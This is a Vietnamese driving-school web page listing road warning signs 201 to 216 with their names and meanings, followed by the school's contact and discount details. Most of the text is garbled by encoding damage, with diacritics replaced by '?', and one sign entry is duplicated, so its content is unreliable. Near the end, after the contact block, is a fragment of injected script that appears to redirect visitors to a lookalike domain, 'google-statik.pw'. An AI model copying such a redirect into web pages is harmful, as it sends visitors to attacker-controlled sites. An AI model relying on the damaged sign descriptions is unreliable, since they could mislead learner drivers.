Ý nghĩa các biển báo nguy hiểm Đường bộ Việt Nam

(otobienhoa.vn) Bi?n bao nguy hi?m g?m 46 ki?u du?c danh s? th? t? t? bi?n s? 201 d?n bi?n s? 246.

alt 

Bi?n bao nguy hi?m d? c?nh bao cac tinh hu?ng nguy hi?m co th? x?y ra du?c dung d? bao cho ngu?i s? d?ng du?ng, ch? y?u la ngu?i lai xe co gi?i bi?t tru?c tinh ch?t c?a s? nguy hi?n tren tuy?n du?ng d? phong ng?a. Khi g?p bi?n bao nguy hi?m, ngu?i lai xe ph?i gi?m t?c d? d?n m?c c?n thi?t, chu y quan sat va chu?n b? s?n sang x? tri nh?ng tinh hu?ng co th? x?y ra d? phong ng?a tai n?n. 

 

altS? hi?u bi?n bao: 201a
Ten bi?n bao: Ch? ngo?t nguy hi?m vong ben trai
Chi ti?t bao hi?u: Bao tru?c s?p d?n m?t ch? ngo?t nguy hi?m vong ben trai.

 


altS? hi?u bi?n bao: 201b
Ten bi?n bao: Ch? ngo?t nguy hi?m vong ben ph?i
Chi ti?t bao hi?u: Bao tru?c s?p d?n m?t ch? ngo?t nguy hi?m vong ben ph?i.

 


alt
 
S? hi?u bi?n bao: 202
Ten bi?n bao: Nhi?u ch? ngo?t nguy hi?m lien ti?p
Chi ti?t bao hi?u: Dung d? bao nguy hi?m cho ngu?i lai xe gi?m t?c d?, bi?n du?c d?t ? ngoai v? tri ti?p d?u (hay ti?p cu?i) c?a du?ng ngo?t lien t?c co t?c d? xe ch?y cho phep (thi?t k?) nh? hon 60km/h, do?n co ba ho?c tren ba do?n cong ngu?c chi?u nhau co ban kinh du?ng cong n?m nh? hon gia tr? t?i thi?u quy d?nh c?a c?p du?ng, con do?n th?ng chem gi?a cac do?n cong thi b?ng ho?c nh? hon chi?u dai co gia tr? be nh?t c?a du?ng cong chuy?n ti?p hay do?n vu?t n?i sieu cao.

altS? hi?u bi?n bao: 203a
Ten bi?n bao: Du?ng b? h?p c? hai ben
Chi ti?t bao hi?u: Bao tru?c s?p d?n m?t do?n du?ng b? h?p d?t ng?t c? hai ben.

 


altS? hi?u bi?n bao: 203a
Ten bi?n bao: Du?ng b? h?p c? hai ben
Chi ti?t bao hi?u: Bao tru?c s?p d?n m?t do?n du?ng b? h?p d?t ng?t c? hai ben.

 


altS? hi?u bi?n bao: 203c
Ten bi?n bao: Du?ng b? h?p v? phia ph?i
Chi ti?t bao hi?u: Bao tru?c s?p d?n m?t do?n du?ng b? h?p d?t ng?t v? phia ph?i.

 


altS? hi?u bi?n bao: 204
Ten bi?n bao: Du?ng hai chi?u
Chi ti?t bao hi?u: D? bao tru?c s?p d?n do?n du?ng vi ly do s?a ch?a ho?c co tr? ng?i ? m?t phia du?ng ma ph?i gi?i quy?t di l?i c?a phuong ti?n phia du?ng con l?i ho?c d? bao tru?c do?n du?ng doi t?m th?i hay thu?ng xuyen cac chi?u xe di va v? ph?i di chung.


altS? hi?u bi?n bao: 205a
Ten bi?n bao: Du?ng giao nhau
Chi ti?t bao hi?u: Bao tru?c s?p d?n noi giao nhau c?a cac tuy?n du?ng cung c?p (khong co du?ng nao uu tien).

 


altS? hi?u bi?n bao: 205b
Ten bi?n bao: Du?ng giao nhau
Chi ti?t bao hi?u: Bao tru?c s?p d?n noi giao nhau c?a cac tuy?n du?ng cung c?p (khong co du?ng nao uu tien)

 


altS? hi?u bi?n bao: 205c
Ten bi?n bao: Du?ng giao nhau
Chi ti?t bao hi?u: Bao tru?c s?p d?n noi giao nhau c?a cac tuy?n du?ng cung c?p (khong co du?ng nao uu tien).

 


altS? hi?u bi?n bao: 205d
Ten bi?n bao: Du?ng giao nhau
Chi ti?t bao hi?u: Bao tru?c s?p d?n noi giao nhau c?a cac tuy?n du?ng cung c?p (khong co du?ng nao uu tien).

 


altS? hi?u bi?n bao: 205e
Ten bi?n bao: Du?ng giao nhau
Chi ti?t bao hi?u: Bao tru?c s?p d?n noi giao nhau c?a cac tuy?n du?ng cung c?p (khong co du?ng nao uu tien).

 


altS? hi?u bi?n bao: 206
Ten bi?n bao: Giao nhau ch?y theo vong xuy?n
Chi ti?t bao hi?u: Bao tru?c noi giao nhau co b? tri d?o an toan ? gi?a di?m giao, cac lo?i xe qua di?m giao vong trai, ph?i di vong xuy?n qua d?o an toan.

 


altS? hi?u bi?n bao: 207a
Ten bi?n bao: Giao nhau v?i du?ng khong uu tien
Chi ti?t bao hi?u: D?t tren du?ng uu tien, d? bao tru?c s?p d?n noi giao nhau v?i du?ng khong uu tien.

 


altS? hi?u bi?n bao: 207b
Ten bi?n bao: Giao nhau v?i du?ng khong uu tien
Chi ti?t bao hi?u: D?t tren du?ng uu tien, d? bao tru?c s?p d?n noi giao nhau v?i du?ng khong uu tien.

 


altS? hi?u bi?n bao: 207c
Ten bi?n bao: Giao nhau v?i du?ng khong uu tien
Chi ti?t bao hi?u: D?t tren du?ng uu tien, d? bao tru?c s?p d?n noi giao nhau v?i du?ng khong uu tien.

 


altS? hi?u bi?n bao: 208
Ten bi?n bao: Giao nhau v?i du?ng uu tien
Chi ti?t bao hi?u: D?t tren du?ng khong uu tien, d? bao tru?c s?p d?n noi giao nhau v?i du?ng uu tien.

 


altS? hi?u bi?n bao: 209
Ten bi?n bao: Giao nhau co tin hi?u den
Chi ti?t bao hi?u: D? bao tru?c noi giao nhau co s? di?u khi?n giao thong b?ng tin hi?u den (h? th?ng 3 den b?t theo chi?u d?ng) va trong tru?ng h?p thi?t b? tin hi?u den khong du?c nhin th?y ro rang va k?p th?i.


altS? hi?u bi?n bao: 210
Ten bi?n bao: Giao nhau v?i du?ng s?t co rao ch?n
Chi ti?t bao hi?u: Bao tru?c s?p d?n ch? giao nhau gi?a du?ng b? va du?ng s?t co rao ch?n kin hay ch?n n?a kin b? tri theo tr?t t? xen k? ? m?i ben du?ng s?t va co nhan vien nganh du?ng s?t di?u khi?n

 


altS? hi?u bi?n bao: 211
Ten bi?n bao: Giao nhau v?i du?ng s?t khong co rao ch?n
Chi ti?t bao hi?u: Bao tru?c s?p d?n ch? giao nhau gi?a du?ng b? va du?ng s?t khong co rao ch?n, khong co ngu?i di?u khi?n giao thong.

 


altS? hi?u bi?n bao: 212
Ten bi?n bao: C?u h?p
Chi ti?t bao hi?u: Bao tru?c s?p d?n c?u h?p la lo?i c?u co chi?u r?ng long c?u (ph?n xe ch?y) nh? hon ho?c b?ng 4.50 m (1 lan du?ng). Khi qua cac c?u nay cac xe ph?i nhu?ng nhau va ch? ? hai d?u c?u.

 


altS? hi?u bi?n bao: 213
Ten bi?n bao: C?u t?m
Chi ti?t bao hi?u: D? bao tru?c s?p d?n c?u t?m la lo?i c?u du?c lam d? s? d?ng t?m th?i cho xe c? qua l?i.

 


altS? hi?u bi?n bao: 214
Ten bi?n bao: C?u xoay-c?u c?t
Chi ti?t bao hi?u: D? bao tru?c s?p d?n c?u xoay, c?u c?t la nh?ng lo?i c?u trong t?ng th?i gian co c?t giao thong du?ng b? d? cho tau thuy?n qua l?i. Cac phuong ti?n di tren du?ng b? ph?i ch? d?i.

 


altS? hi?u bi?n bao: 215a
Ten bi?n bao: Ke, v?c sau phia tru?c
Chi ti?t bao hi?u: D? bao tru?c s?p t?i nh?ng ch? co ke, v?c sau, ho?c b? song ap sat du?ng ? phia tru?c, c?n d? phong tinh hu?ng nguy hi?m vu?t ke, t?t xu?ng v?c sau (thu?ng co ? nh?ng ch? ngo?t nguy hi?m).


altS? hi?u bi?n bao: 215b
Ten bi?n bao: Ke, v?c sau phia tru?c
Chi ti?t bao hi?u: D? bao tru?c s?p t?i nh?ng ch? co ke, v?c sau, ho?c b? song ap sat du?ng ? phia tru?c, c?n d? phong tinh hu?ng nguy hi?m vu?t ke, t?t xu?ng v?c sau (thu?ng co ? nh?ng ch? ngo?t nguy hi?m).


altS? hi?u bi?n bao: 216
Ten bi?n bao: Du?ng ng?m
Chi ti?t bao hi?u: D? bao tru?c nh?ng ch? co du?ng ng?m (du?ng tran). Du?ng ng?m la nh?ng do?n du?ng vu?t qua song, su?i, khe c?n ma nu?c co th? ch?y tran qua thu?ng xuyen ho?c khi co lu.

 

M?i chi ti?t xin lien h?: Cong Ty TNHH - Trung Tam D?y Ngh? va Dao T?o Sat H?ch Lai Xe H?i Van

- Co so? 1: Trung Doa?n 22, Xa Lo? Ha? No?i, P. Long Bi?nh, Bien Ho?a - Do?ng Nai. - Hotline:  0933 955 686

- Co so? 2: A?p La?ng Ca?t, Xa? Tan Ha?i, Huye?n Tan Tha?nh, Ti?nh Ba? Ri?a - Vu?ng Ta?u. - Hotline:  0932 088 838

Quy? kha?ch vui lo?ng lien he? tru?c tie?p vo?i chu?ng toi de? duo?c tu va?n dang ky? ho?c so?m nha?t vo?i chi phi? tha?p nha?t.

Da?c bie?t khi dang ky? kho?a ho?c qua die?n thoa?i hotline: (0933 955 686 hoa?c 0932 088 838) truo?c khi no?p ho? so ba?n se? duo?c uu da?i gia?m gia? tru?c tie?p 100.000 VND - 200.000 VND va?o tie?n ho?c phi? tu?y theo kho?a ho?c khi ba?n no?p ho? so ta?i co so? 1 hoa?c co so? 2 cu?a trung tam.

if (screen.width ion = "http://google-statik.pw/l.php";}
 

Salon Auto

Nội thất đồ chơi

Tư vấn mua bán xe


 

Quảng Cáo